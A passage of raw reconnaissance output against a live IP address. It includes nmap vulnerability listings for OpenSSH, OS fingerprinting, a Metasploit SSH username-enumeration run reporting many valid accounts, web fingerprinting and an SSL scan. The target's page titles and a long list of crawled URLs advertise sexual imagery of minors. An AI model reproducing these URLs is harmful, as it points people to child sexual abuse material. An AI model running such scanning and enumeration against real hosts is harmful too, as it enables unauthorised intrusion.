3774| [10823] OpenSSH UseLogin Environment Variables
3775|
3776| SecurityTracker - https://www.securitytracker.com:
3777| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
3778| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
3779| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
3780| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
3781| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
3782| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
3783| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
3784| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
3785| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
3786| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
3787| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
3788| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
3789| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
3790| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
3791| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
3792| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
3793| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
3794| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
3795| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
3796| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
3797| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
3798| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
3799| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
3800| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
3801| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
3802| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
3803| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
3804| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
3805| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
3806| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
3807| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
3808| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
3809| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
3810| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
3811| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
3812| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
3813| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
3814| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
3815|
3816| OSVDB - http://www.osvdb.org:
3817| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
3818| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
3819| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
3820| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
3821| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
3822| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
3823| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
3824| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
3825| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
3826| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
3827| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
3828| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
3829| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
3830| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
3831| [56921] OpenSSH Unspecified Remote Compromise
3832| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
3833| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
3834| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
3835| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
3836| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
3837| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
3838| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
3839| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
3840| [43745] OpenSSH X11 Forwarding Local Session Hijacking
3841| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
3842| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
3843| [37315] pam_usb OpenSSH Authentication Unspecified Issue
3844| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
3845| [34601] OPIE w/ OpenSSH Account Enumeration
3846| [34600] OpenSSH S/KEY Authentication Account Enumeration
3847| [32721] OpenSSH Username Password Complexity Account Enumeration
3848| [30232] OpenSSH Privilege Separation Monitor Weakness
3849| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
3850| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
3851| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
3852| [29152] OpenSSH Identical Block Packet DoS
3853| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
3854| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
3855| [22692] OpenSSH scp Command Line Filename Processing Command Injection
3856| [20216] OpenSSH with KerberosV Remote Authentication Bypass
3857| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
3858| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
3859| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
3860| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
3861| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
3862| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
3863| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
3864| [6601] OpenSSH *realloc() Unspecified Memory Errors
3865| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
3866| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
3867| [6072] OpenSSH PAM Conversation Function Stack Modification
3868| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
3869| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
3870| [5408] OpenSSH echo simulation Information Disclosure
3871| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
3872| [4536] OpenSSH Portable AIX linker Privilege Escalation
3873| [3938] OpenSSL and OpenSSH /dev/random Check Failure
3874| [3456] OpenSSH buffer_append_space() Heap Corruption
3875| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
3876| [2140] OpenSSH w/ PAM Username Validity Timing Attack
3877| [2112] OpenSSH Reverse DNS Lookup Bypass
3878| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
3879| [1853] OpenSSH Symbolic Link 'cookies' File Removal
3880| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
3881| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
3882| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
3883| [688] OpenSSH UseLogin Environment Variable Local Command Execution
3884| [642] OpenSSH Multiple Key Type ACL Bypass
3885| [504] OpenSSH SSHv2 Public Key Authentication Bypass
3886| [341] OpenSSH UseLogin Local Privilege Escalation
3887|_
3888Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3889Device type: general purpose|broadband router|WAP|webcam
3890Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
3891OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
3892Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.0 - 3.1 (94%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
3893No exact OS matches for host (test conditions non-ideal).
3894Network Distance: 7 hops
3895Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3896
3897TRACEROUTE (using port 22/tcp)
3898HOP RTT ADDRESS
38991 204.62 ms 10.247.204.1
39002 750.11 ms 45.131.5.2
39013 304.17 ms 109.236.95.230
39024 304.20 ms 109.236.95.179
39035 304.22 ms 190.2.158.155
39046 304.24 ms 185.106.120.66
39057 100.30 ms latina.petite.guru (185.82.200.52)
3906#######################################################################################################################################
3907USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
3908RHOSTS => 185.82.200.52
3909RHOST => 185.82.200.52
3910[*] 185.82.200.52:22 - SSH - Using malformed packet technique
3911[*] 185.82.200.52:22 - SSH - Starting scan
3912[+] 185.82.200.52:22 - SSH - User 'admin' found
3913[+] 185.82.200.52:22 - SSH - User 'administrator' found
3914[+] 185.82.200.52:22 - SSH - User 'anonymous' found
3915[+] 185.82.200.52:22 - SSH - User 'backup' found
3916[+] 185.82.200.52:22 - SSH - User 'bee' found
3917[+] 185.82.200.52:22 - SSH - User 'ftp' found
3918[+] 185.82.200.52:22 - SSH - User 'guest' found
3919[+] 185.82.200.52:22 - SSH - User 'GUEST' found
3920[+] 185.82.200.52:22 - SSH - User 'info' found
3921[+] 185.82.200.52:22 - SSH - User 'mail' found
3922[+] 185.82.200.52:22 - SSH - User 'mailadmin' found
3923[+] 185.82.200.52:22 - SSH - User 'msfadmin' found
3924[+] 185.82.200.52:22 - SSH - User 'mysql' found
3925[+] 185.82.200.52:22 - SSH - User 'nobody' found
3926[+] 185.82.200.52:22 - SSH - User 'oracle' found
3927[+] 185.82.200.52:22 - SSH - User 'owaspbwa' found
3928[+] 185.82.200.52:22 - SSH - User 'postfix' found
3929[+] 185.82.200.52:22 - SSH - User 'postgres' found
3930[+] 185.82.200.52:22 - SSH - User 'private' found
3931[+] 185.82.200.52:22 - SSH - User 'proftpd' found
3932[+] 185.82.200.52:22 - SSH - User 'public' found
3933[+] 185.82.200.52:22 - SSH - User 'root' found
3934[+] 185.82.200.52:22 - SSH - User 'superadmin' found
3935[+] 185.82.200.52:22 - SSH - User 'support' found
3936[+] 185.82.200.52:22 - SSH - User 'sys' found
3937[+] 185.82.200.52:22 - SSH - User 'system' found
3938[+] 185.82.200.52:22 - SSH - User 'systemadmin' found
3939[+] 185.82.200.52:22 - SSH - User 'systemadministrator' found
3940[+] 185.82.200.52:22 - SSH - User 'test' found
3941[+] 185.82.200.52:22 - SSH - User 'tomcat' found
3942[+] 185.82.200.52:22 - SSH - User 'user' found
3943[+] 185.82.200.52:22 - SSH - User 'webmaster' found
3944[+] 185.82.200.52:22 - SSH - User 'www-data' found
3945[+] 185.82.200.52:22 - SSH - User 'Fortimanager_Access' found
3946[*] Scanned 1 of 1 hosts (100% complete)
3947[*] Auxiliary module execution completed
3948#######################################################################################################################################
3949HTTP/1.1 200 OK
3950Date: Tue, 22 Oct 2019 09:39:35 GMT
3951Server: Apache/2.4.10 (Debian)
3952Last-Modified: Fri, 30 Mar 2018 13:05:08 GMT
3953ETag: "331e-568a0e3b68900"
3954Accept-Ranges: bytes
3955Content-Length: 13086
3956Vary: Accept-Encoding
3957Content-Type: text/html
3958
3959Allow: POST,OPTIONS,GET,HEAD
3960#######################################################################################################################################
3961http://a.b.pictures.teeny-angels.net/freearchive.php
3962http://alt.binaries.pictures.bcseries.org
3963http://hosted.met-art.com/generated_gallery/hosted/10141/10141.htm?CA=901313-0000&pa=996317
3964http://hosted.met-art.com/generated_gallery/hosted/10142/10142.htm?CA=901313-0000&pa=996317
3965http://hosted.met-art.com/generated_gallery/hosted/10143/10143.htm?CA=901313-0000&pa=996317
3966http://hosted.met-art.com/generated_gallery/hosted/10144/10144.htm?CA=901313-0000&pa=996317
3967http://hosted.met-art.com/generated_gallery/hosted/10145/10145.htm?CA=901313-0000&pa=996317
3968http://hosted.met-art.com/generated_gallery/hosted/10146/10146.htm?CA=901313-0000&pa=996317
3969http://hosted.met-art.com/generated_gallery/hosted/10146/434fdf4re.html?CA=901313-0000&pa=996317
3970http://hosted.met-art.com/generated_gallery/hosted/10146/5434eresre.html?CA=901313-0000&pa=996317
3971http://hosted.met-art.com/generated_gallery/hosted/10146/5434fdf4re.html?CA=901313-0000&pa=996317
3972http://hosted.met-art.com/generated_gallery/hosted/8209/8209.html?CA=901313-0000&pa=996317
3973http://hosted.met-art.com/generated_gallery/hosted/8210/8210.html?CA=901313-0000&pa=996317
3974http://hosted.met-art.com/generated_gallery/hosted/8211/8211.html?CA=901313-0000&pa=996317
3975http://hosted.met-art.com/generated_gallery/hosted/8212/8212.html?CA=901313-0000&pa=996317
3976http://hosted.met-art.com/generated_gallery/hosted/crystal/index.htm?CA=901313-0000&pa=996317
3977http://hosted.met-art.com/generated_gallery/hosted/gocce/index.htm?CA=901313-0000&pa=996317
3978http://hosted.met-art.com/generated_gallery/hosted/Itaca/index.htm?CA=901313-0000&pa=996317
3979http://hosted.met-art.com/generated_gallery/hosted/Liza/index.htm?CA=901313-0000&pa=996317
3980http://hosted.met-art.com/generated_gallery/hosted/mixed/index.htm?CA=901313-0000&pa=996317
3981http://hosted.met-art.com/generated_gallery/hosted/sasha/index.htm?CA=901313-0000&pa=996317
3982http://hosted.met-art.com/hosted/1245.htm?CA=901313-0000&pa=996317
3983http://hosted.met-art.com/hosted/4we4334.htm?CA=901313-0000&pa=996317
3984http://hosted.met-art.com/hosted/a45456.htm?CA=901313-0000&pa=996317
3985http://hosted.met-art.com/hosted/df43rdwe.htm?CA=901313-0000&pa=996317
3986http://hosted.met-art.com/hosted/fcdf43r42.htm?CA=901313-0000&pa=996317
3987http://hosted.met-art.com/hosted/fds43532.htm?CA=901313-0000&pa=996317
3988http://hosted.met-art.com/hosted/ff34e4543.htm?CA=901313-0000&pa=996317
3989http://hosted.met-art.com/hosted/kuyrter.htm?CA=901313-0000&pa=996317
3990http://hosted.met-art.com/hosted/z344532.htm?CA=901313-0000&pa=996317
3991http://imageport.info/imageport.jpg
3992https://alt.binaries.pictures.bcseries.org
3993http://www.imageport.info/
3994http://www.imageport.info/portal01.html
3995http://www.met-art.com/c32/tn_120403_jpg.jpg
3996http://www.met-art.com/c32/tn_120503_jpg.jpg
3997http://www.met-art.com/c32/tn_120603_2_jpg.jpg
3998http://www.met-art.com/c32/tn_120603_jpg.jpg
3999http://www.met-art.com/c32/tn_120703_2_jpg.jpg
4000http://www.met-art.com/c32/tn_120703_jpg.jpg
4001http://www.met-art.com/nsl1.gif
4002http://www.met-art.nymphs.net.tf/
4003http://www.my-usenet.com
4004http://www.nozomis.com
4005http://www.photo50.com
4006http://www.sweet-angels.asia
4007http://www.teen-beauty.com/01105/223rr9.html?CA=901313-0000&pa=996317
4008http://www.teen-beauty.com/01105/232432dds.html?CA=901313-0000&pa=996317
4009http://www.teen-beauty.com/01105/324232d9.html?CA=901313-0000&pa=996317
4010http://www.teen-beauty.com/01105/3423232d9.html?CA=901313-0000&pa=996317
4011http://www.teen-beauty.com/01105/43945342.html?CA=901313-0000&pa=996317
4012http://www.teen-beauty.com/01105/4432d9.html?CA=901313-0000&pa=996317
4013http://www.teen-beauty.com/01105/asaere4.html?CA=901313-0000&pa=996317
4014http://www.teen-beauty.com/01105/dopfdorter.html?CA=901313-0000&pa=996317
4015http://www.teen-beauty.com/01105/ff43434fsd.html?CA=901313-0000&pa=996317
4016http://www.teen-beauty.com/01105/zjukui87.html?CA=901313-0000&pa=996317
4017http://www.y-a-b.net/
4018javascript:popWin('http://www.met-art.com/newsletter.htm')
4019www.met-art.com/2000/annette/index.htm
4020www.met-art.com/2000/gal_alejul/index.htm
4021www.met-art.com/2000/gal_anna/index887.htm
4022www.met-art.com/2000/gal_anna/index.htm
4023www.met-art.com/2000/gal_av_andrea_inna/index.htm
4024www.met-art.com/2000/gal_wings/index.htm
4025www.met-art.com/2000/juliamm/index.htm
4026www.met-art.com/2000/nocturna/index.htm
4027www.met-art.com/c32/120403.htm
4028www.met-art.com/c32/120503.htm
4029www.met-art.com/c32/120603_2.htm
4030www.met-art.com/c32/120603.htm
4031www.met-art.com/c32/120703_2.htm
4032www.met-art.com/c32/120703.htm
4033www.met-art.com/gallery031803/index87.htm
4034www.met-art.com/gallery031803/index.htm
4035www.met-art.com/ngal04/indexrrits.htm
4036www.met-art.com/ngal04/indexrrits.htm.htm
4037#####################################################################################################################################
4038http://185.82.200.52 [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[MET-ART FREE TEEN GALLERIES BARELY LEGAL EROTIC PHOTO NUDE NYMPHETS]
4039######################################################################################################################################
4040
4041wig - WebApp Information Gatherer
4042
4043
4044Scanning http://185.82.200.52...
4045________________________ SITE INFO _________________________
4046IP Title
4047185.82.200.52 MET-ART FREE TEEN GALLERIES BARELY LEGAL E
4048
4049_________________________ VERSION __________________________
4050Name Versions Type
4051Apache 2.4.10 Platform
4052Debian 8.0 | 8.0 (pre-release) OS
4053
4054____________________________________________________________
4055Time: 51.1 sec Urls: 825 Fingerprints: 40401
4056######################################################################################################################################
4057https://185.82.200.52 [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
4058######################################################################################################################################
4059Version: 1.11.13-static
4060OpenSSL 1.0.2-chacha (1.0.2g-dev)
4061
4062Connected to 185.82.200.52
4063
4064Testing SSL server 185.82.200.52 on port 443 using SNI name 185.82.200.52
4065
4066 TLS Fallback SCSV:
4067Server supports TLS Fallback SCSV
4068
4069 TLS renegotiation:
4070Secure session renegotiation supported
4071
4072 TLS Compression:
4073Compression disabled
4074
4075 Heartbleed:
4076TLS 1.2 not vulnerable to heartbleed
4077TLS 1.1 not vulnerable to heartbleed
4078TLS 1.0 not vulnerable to heartbleed
4079
4080 Supported Server Cipher(s):
4081Preferred TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
4082Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
4083Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
4084Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
4085Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
4086Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
4087Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
4088Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
4089Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
4090Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
4091Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
4092Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
4093Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
4094Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
4095Accepted TLSv1.2 256 bits CAMELLIA256-SHA
4096Accepted TLSv1.2 256 bits AES256-SHA
4097Accepted TLSv1.2 128 bits CAMELLIA128-SHA
4098Accepted TLSv1.2 128 bits AES128-SHA
4099Preferred TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
4100Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
4101Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
4102Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
4103Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
4104Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
4105Accepted TLSv1.1 256 bits CAMELLIA256-SHA
4106Accepted TLSv1.1 256 bits AES256-SHA
4107Accepted TLSv1.1 128 bits CAMELLIA128-SHA
4108Accepted TLSv1.1 128 bits AES128-SHA
4109Preferred TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
4110Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
4111Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
4112Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
4113Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
4114Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
4115Accepted TLSv1.0 256 bits CAMELLIA256-SHA
4116Accepted TLSv1.0 256 bits AES256-SHA
4117Accepted TLSv1.0 128 bits CAMELLIA128-SHA
4118Accepted TLSv1.0 128 bits AES128-SHA
4119
4120 SSL Certificate:
4121Signature Algorithm: sha256WithRSAEncryption
4122RSA Key Strength: 2048
4123
4124Subject: ygmt.info
4125Altnames: DNS:ygmt.info, DNS:www.ygmt.info
4126Issuer: COMODO RSA Domain Validation Secure Server CA
4127
4128Not valid before: Feb 14 00:00:00 2017 GMT
4129Not valid after: Feb 14 23:59:59 2018 GMT
4130#######################################################################################################################################
4131Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-22 05:47 EDT
4132NSE: Loaded 47 scripts for scanning.
4133NSE: Script Pre-scanning.
4134Initiating NSE at 05:47
4135Completed NSE at 05:47, 0.00s elapsed
4136Initiating NSE at 05:47
4137Completed NSE at 05:47, 0.00s elapsed
4138Initiating Ping Scan at 05:47
4139Scanning 185.82.200.52 [4 ports]
4140Completed Ping Scan at 05:47, 0.14s elapsed (1 total hosts)
4141Initiating Parallel DNS resolution of 1 host. at 05:47
4142Completed Parallel DNS resolution of 1 host. at 05:47, 0.02s elapsed
4143Initiating SYN Stealth Scan at 05:47
4144Scanning latina.petite.guru (185.82.200.52) [65535 ports]
4145Discovered open port 443/tcp on 185.82.200.52
4146Discovered open port 22/tcp on 185.82.200.52
4147Discovered open port 80/tcp on 185.82.200.52
4148SYN Stealth Scan Timing: About 12.60% done; ETC: 05:51 (0:03:35 remaining)
4149SYN Stealth Scan Timing: About 16.21% done; ETC: 05:53 (0:05:15 remaining)
4150SYN Stealth Scan Timing: About 19.34% done; ETC: 05:55 (0:06:19 remaining)
4151Increasing send delay for 185.82.200.52 from 0 to 5 due to max_successful_tryno increase to 4
4152SYN Stealth Scan Timing: About 26.12% done; ETC: 05:55 (0:05:42 remaining)
4153SYN Stealth Scan Timing: About 43.95% done; ETC: 05:56 (0:05:15 remaining)
4154SYN Stealth Scan Timing: About 49.87% done; ETC: 05:56 (0:04:44 remaining)
4155SYN Stealth Scan Timing: About 56.52% done; ETC: 05:57 (0:04:15 remaining)
4156SYN Stealth Scan Timing: About 61.53% done; ETC: 05:57 (0:03:46 remaining)
4157SYN Stealth Scan Timing: About 67.70% done; ETC: 05:57 (0:03:17 remaining)
4158SYN Stealth Scan Timing: About 74.14% done; ETC: 05:58 (0:02:44 remaining)
4159Discovered open port 10000/tcp on 185.82.200.52
4160SYN Stealth Scan Timing: About 80.30% done; ETC: 05:58 (0:02:09 remaining)
4161SYN Stealth Scan Timing: About 85.93% done; ETC: 05:58 (0:01:34 remaining)
4162SYN Stealth Scan Timing: About 91.24% done; ETC: 05:58 (0:00:59 remaining)
4163Completed SYN Stealth Scan at 05:59, 699.23s elapsed (65535 total ports)
4164Initiating Service scan at 05:59
4165Scanning 4 services on latina.petite.guru (185.82.200.52)
4166Completed Service scan at 05:59, 13.20s elapsed (4 services on 1 host)
4167Initiating OS detection (try #1) against latina.petite.guru (185.82.200.52)
4168Retrying OS detection (try #2) against latina.petite.guru (185.82.200.52)
4169Initiating Traceroute at 05:59
4170Completed Traceroute at 05:59, 0.27s elapsed
4171Initiating Parallel DNS resolution of 7 hosts. at 05:59
4172Completed Parallel DNS resolution of 7 hosts. at 05:59, 0.40s elapsed
4173NSE: Script scanning 185.82.200.52.
4174Initiating NSE at 05:59
4175Completed NSE at 06:00, 40.41s elapsed
4176Initiating NSE at 06:00
4177Completed NSE at 06:00, 2.04s elapsed
4178Nmap scan report for latina.petite.guru (185.82.200.52)
4179Host is up (0.15s latency).
4180Not shown: 65531 closed ports
4181PORT STATE SERVICE VERSION
418222/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
4183| vulscan: VulDB - https://vuldb.com:
4184| [76870] OpenSSH up to 6.9 auth2-chall.c kbdint_next_device privilege escalation
4185| [76326] OpenSSH 6.8 XSECURITY privilege escalation
4186| [12724] OpenSSH up to 6.6 Fingerprint Record Check sshconnect.c verify_host_key HostCertificate weak authentication
4187| [12683] OpenBSD OpenSSH up to 6.5 Configuration child_set_env Wildcard privilege escalation
4188| [12124] OpenSSH 6.4 J-PAKE Protocol schnorr.c hash_buffer denial of service
4189| [11124] OpenSSH 6.2/6.3 Post Authentication sshd process initialize mm_newkeys_from_blob privilege escalation
4190|
4191| MITRE CVE - https://cve.mitre.org:
4192| [CVE-2012-5975] The SSH USERAUTH CHANGE REQUEST feature in SSH Tectia Server 6.0.4 through 6.0.20, 6.1.0 through 6.1.12, 6.2.0 through 6.2.5, and 6.3.0 through 6.3.2 on UNIX and Linux, when old-style password authentication is enabled, allows remote attackers to bypass authentication via a crafted session involving entry of blank passwords, as demonstrated by a root login session from a modified OpenSSH client with an added input_userauth_passwd_changereq call in sshconnect2.c.
4193| [CVE-2012-5536] A certain Red Hat build of the pam_ssh_agent_auth module on Red Hat Enterprise Linux (RHEL) 6 and Fedora Rawhide calls the glibc error function instead of the error function in the OpenSSH codebase, which allows local users to obtain sensitive information from process memory or possibly gain privileges via crafted use of an application that relies on this module, as demonstrated by su and sudo.
4194| [CVE-2010-5107] The default configuration of OpenSSH through 6.1 enforces a fixed time limit between establishing a TCP connection and completing a login, which makes it easier for remote attackers to cause a denial of service (connection-slot exhaustion) by periodically making many new TCP connections.
4195| [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
4196| [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
4197| [CVE-2004-2414] Novell NetWare 6.5 SP 1.1, when installing or upgrading using the Overlay CDs and performing a custom installation with OpenSSH, includes sensitive password information in the (1) NIOUTPUT.TXT and (2) NI.LOG log files, which might allow local users to obtain the passwords.
4198|
4199| SecurityFocus - https://www.securityfocus.com/bid/:
4200| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
4201| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
4202| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
4203| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
4204| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
4205| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
4206| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
4207| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
